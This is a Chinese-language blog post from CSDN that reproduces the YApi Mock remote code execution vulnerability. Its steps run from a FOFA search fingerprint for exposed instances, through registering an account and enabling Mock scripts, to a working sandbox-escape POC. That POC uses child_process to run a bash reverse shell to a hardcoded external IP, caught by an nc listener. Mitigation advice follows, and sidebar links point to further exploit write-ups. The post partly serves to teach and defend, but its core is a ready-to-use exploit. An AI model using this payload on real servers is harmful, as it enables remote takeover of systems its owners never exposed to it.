[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

已于 2022-08-05 14:39:32 修改
阅读量1.9k 收藏 64
点赞数 54
分类专栏: 漏洞复现篇 文章标签: 网络 安全 web安全 服务器 漏洞复现
于 2022-08-02 19:00:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/126127223
版权

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

一、漏洞描述

API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。

二、fofa指纹

app=“YAPI”

在这里插入图片描述

三、利用过程

1、打开登录页面,注册账号
2、新增项目,新增接口
3、打开高级Mock
4、开启脚本
5、写入poc
6、访问接口
7、getshell

四、环境搭建

1、Docker部署

https://github.com/Ryan-Miao/docker-yapi

在这里插入图片描述

可参考连接:

五、代码执行

1、打开登录页面,注册账号

在这里插入图片描述

随便填写
在这里插入图片描述

2、添加项目、添加接口

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、打开高级Mock

4、开启脚本

在这里插入图片描述

5、写入poc

在这里插入图片描述

6、访问接口

在这里插入图片描述

7、命令执行成功

在这里插入图片描述

六、Getshell(nc和nc的反向连接)

上面我们成功的执行了ls
我们把ls换成反弹shell的命令,就可以成功getshell了
Nc学习可参考链接:

1、攻击机监听

反弹shell我们就用nc就好了,linux系统是自带nc的
攻击机执行nc -lvv 44444进行监听

nc -lvvp 44444

有师傅可能看到我这里执行的是nc -lvv 44444
可能由于我用的vps是centos8的缘故,可能命令不一样。

在这里插入图片描述

2、靶机连接

新建项目,新建接口

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

打开高级mack,开启脚本,写入poc

就是之前代码执行的步骤。只需要把POC换一下就可以

在这里插入图片描述

POC

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("bash -i>&/dev/tcp/124.70.29.182/44444 0>&1)").toString()

访问接口

直接访问这个链接

在这里插入图片描述
在这里插入图片描述

攻击机getshell

Shell就反弹回来了

在这里插入图片描述

我们同样执行一下ls

在这里插入图片描述

七、漏洞防御:

1、关闭YApi用户注册功能;修改完成后,重启YApi服务

"config.json"添加"closeRegister:true"配置项:
 { 
"port": "*****", 
"closeRegister":true 
}

2、暂时关闭mock功能(需要修改YApi代码)

在"config.json"中添加"mock: false";
"exts/yapi-plugin-andvanced-mock/server.js"中找到

if (caseData&&caseData.case_enable{...}

在其上方添加

if(!yapi.WEBCONFIG.mock) {return false;}

3、白名单限制;

安全组配置白名单访问,或者使用NGINX进行代理,限制白名单IP访问;

4、删除恶意

检查用户列表,删除恶意不明用户;并删除恶意不明用户创建的接口及mock脚本。

_PowerShell
关注
  • 54
    点赞
  • 64
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 43
    评论
专栏目录
【实战系列 2】Yapi接口管理平台Getshell-Linux后门权限维持与痕迹清除
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-16 1037
授权渗透测试实战,通过SSH软链接进行Linux后门权限维持,实践如何隐藏历史操作命令、隐藏文件/文件夹、修改文件时间戳以及隐藏权限等方法清除入侵痕迹,做到事后无残留。
如何入门漏洞挖掘,以及提高自己的挖掘能力
键盘的起始页
04-09 1257
0x01:前言 大家好我是米斯特团队的一员,我的id香瓜,我们团队在这次i春秋第二次漏洞挖掘大赛中,包揽了前五名,我key表哥一不小心拿了一个第一,导致很多人来加他好友问他,如何修炼漏洞挖掘能力,我今天帮大家解答一下这个疑问,哈哈哈。 漏洞挖掘是安全圈的一个核心之一,但是随着各大厂商安全意识的增强,以及各类waf的出现。一些像sql注入,文件上传,命令执行这些漏洞也不是那...
漏洞复现-yapi远程执行命令漏洞复现_yapi命令执行漏洞,硬核
2401_83947434的博客
04-20 1218
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
Web Service 渗透测试从入门到精通
weixin_30730053的博客
02-17 660
ref:https://www.anquanke.com/post/id/85910 Web Service 渗透测试从入门到精通 发布时间:2017-04-18 14:26:54 译文声明:本文是翻译文章,文章原作者,文章来源:exploit-db.com原文地址:https://www.exploit-db.com/docs/41888.pdf 译文仅供参考,具...
Metasploit工具介绍及ms17010复现
qq_40216188的博客
01-14 2449
Metasploit渗透框架介绍及永恒之蓝复现
[漏洞复现]Yapi Mock 远程代码执行漏洞复现
3tefanie丶zhou的博客
07-12 367
一丶漏洞介绍 YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。 二丶复现步骤 1.找到注册功能点,注册一个用户 2.利用注册的用户账号密码登陆,添加一个项目 3.然后添加接口 4.在添加的接口里面找到高级Moc,添加脚本POC,保存 5.在预览处点击Mock地址链接,复现成功 三丶修复方案 关闭注册功能,禁止使用默认账号密码 清除可疑账户 删除Mock恶意脚本 ...
常见的API接口漏洞总结
summer_fish的专栏
05-01 3533
熟悉这些漏洞非常重要,这样您就可以轻松识别它们,在参与渗透测试期间利用它们,并将其报告给组织,以防止犯罪分子将您的客户拖入头条新闻。现在您已经熟悉了 Web 应用程序、API 及其弱点。
YApi远程命令执行漏洞分析.pdf
最新发布
04-22
YApi远程命令执行漏洞分析.pdf
yapi:Docker for YApi 一键部署YApi
05-05
Docker for YApi 一键部署YApi JimCY [me@jinfeijie.cn] :warning:注意 :warning:注意:本仓库目前只支持安装,暂不支持升级,请知晓。如需升级请备份mongoDB内的数据。 使用 默认密码是:ymfe.org,安装成功后进入...
yapi.tar.gz
09-09
yapi一键部署,启动脚本文件后可直接查看docker容器
centos系统yapi离线安装包大全
01-24
centos系统yapi离线安装包大全,包含以下文件,已测试安装成功 - node-v12.13.0-linux-x64.tar.xz :nodejs离线...- yapi.tar:yapi执行程序 - pm2.tar.gz:nodejs程序管理工具(可选使用,后台直接启动vue项目也行)
Getshell 网站漏洞批量检测工具破解后使用教程
07-26
Getshell网站漏洞批量检测工具破解后使用教程,运行软件,等待大概 3分钟左右软件才会启动。
yapi离线安装包及环境
06-26
《YAPI离线安装详解与环境配置》 YAPI,全称Yet Another API,是一款基于Node.js开发的高质量、易上手的接口管理工具。它提供了便捷的接口管理功能,帮助开发者更好地组织和测试API,尤其适合团队协作的项目。在...
YAPI 安全漏洞问题,一文修复全解决
咻咻ing的专栏
08-09 791
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。 目前Yapi在GitHub的关注数有523,Star数21.7k,Fork数3.7k,使用的企业非常广泛,包括阿里巴巴、腾讯、百度、去哪儿等等。 近日,不少用户反映YApi平台存在高危漏洞,攻击者可利用该漏洞在目标服务器执行任意代码,可
YAPI漏洞复现
Websec
07-13 1847
YAPI漏洞复现 原地址: https://github.com/YMFE/yapi/issues/2099 一. fofa语法搜索 app=”YAPI” 从搜索到的结果当中任意选择一个地址,比如: http://xxxx:8081/ Yapi的平台默认是可以注册用户的,先注册一个用户进入后台. 注册用户账户密码 test123/test123 1. 首先新建一个项目 2. 新加一个接口 点击【添加接口】。 3. 在高级mo...
Yapi Mock 远程代码执行漏洞
weixin_45694388的博客
07-09 577
跟风一波复现Yapi 漏洞描述: YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态,强烈建议客户尽快采取缓解措施以避免受此漏洞影响 fofa: Fofa:app="YApi" 漏洞复现: 默认注册功能开启。 注册后创建项目: 添加接口: 创建接口成功: 选择“高级Mock”,“脚本”,开启脚本: 写入poc并保存: const sandbox = this const ObjectConstruc
yapi 部署_部署yapi踩坑
weixin_35762258的博客
02-01 4493
YAPI 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。 github地址:https://github.com/YMFE/yapi 示例站点:yapi.demo.qunar.com 文档:hellosean1025.github.io/yapi 二次开发遇到的问题:https://github.com/YMFE/yapi/...
2021DASCTF July X CBCTF 4th(wp)
qq_50589021的博客
08-25 823
CRYPTO Yusa的密码学签到——BlockTrick nc连接以后出来哪个就复制哪个,最后得到flag WEB ezrce 此题属于是YAPI接口管理平台RCE,利用csdn上找到的exp可以直接打: YAPI接口管理平台RCE复现-附exp cat flag 这个题目有点脑洞了 首先是访问/var/log/nginx/aeecss.log 得知真正的flag文件 然后写了一个ascii的不可见字符的fuzz字典生成脚本: <?php $myfile = fopen("ascii.txt"
七、【漏洞复现】YApi接口管理平台远程代码执行漏洞
weixin_52351575的博客
09-21 373
​YApi接口管理平台存在一种远程代码执行漏洞。攻击者可以在注册并登录YApi后,通过构造特殊的请求来执行任意代码,从而接管服务器。这个漏洞可能会导致严重的安全风险,因此建议用户及时修复漏洞,更新到最新版本的YApi。3、 编辑Yapi目录下的 config.json 文件,设置 closeRegister 为 true,关闭Yapi的前台注册功能。若YApi对外开放注册功能,攻击者可在注册并登录后,通过构造特殊的请求执行任意代码,接管服务器。3.新建接口-接口名称随意-接口路径为/随意。
写一YApi的搭建文档
05-17
YApi是一个高效、易用、功能强大的API管理平台,可以帮助团队更好地管理API文档、Mock数据和测试用例。下面是YApi的搭建文档: ## 前置条件 - Node.js环境(推荐v10或以上版本) - MongoDB数据库(推荐v3.6或以上版本) ## 安装 1. 安装YApi:`npm install -g yapi-cli --registry https://registry.npm.taobao.org` 2. 初始化YApi项目:`yapi init` 3. 启动YApi服务:`yapi server` ## 配置 1. 访问YApiWeb管理界面:`http://localhost:3000/` 2. 在Web管理界面中创建管理员账号 3. 在Web管理界面中配置邮件发送设置(可选) 4. 在Web管理界面中配置第三方登录设置(可选) ## 使用 1. 创建项目:在Web管理界面中创建项目,并在项目中创建接口、Mock数据和测试用例 2. 导入Swagger文档:在Web管理界面中导入Swagger文档,快速创建接口并生成Mock数据 3. 使用Mock数据:使用YApi提供的Mock服务器调试接口 4. 使用自动化测试:使用YApi提供的自动化测试功能,对接口进行自动化测试 ## 升级 1. 安装新版本的YApi:`npm install -g yapi-cli --registry https://registry.npm.taobao.org` 2. 运行升级命令:`yapi upgrade` 以上就是YApi的搭建文档,希望能帮助到你。如果你有任何问题或需要更多帮助,请参考YApi的官方文档或者在YApi的官方论坛中寻求帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 43
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_PowerShell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值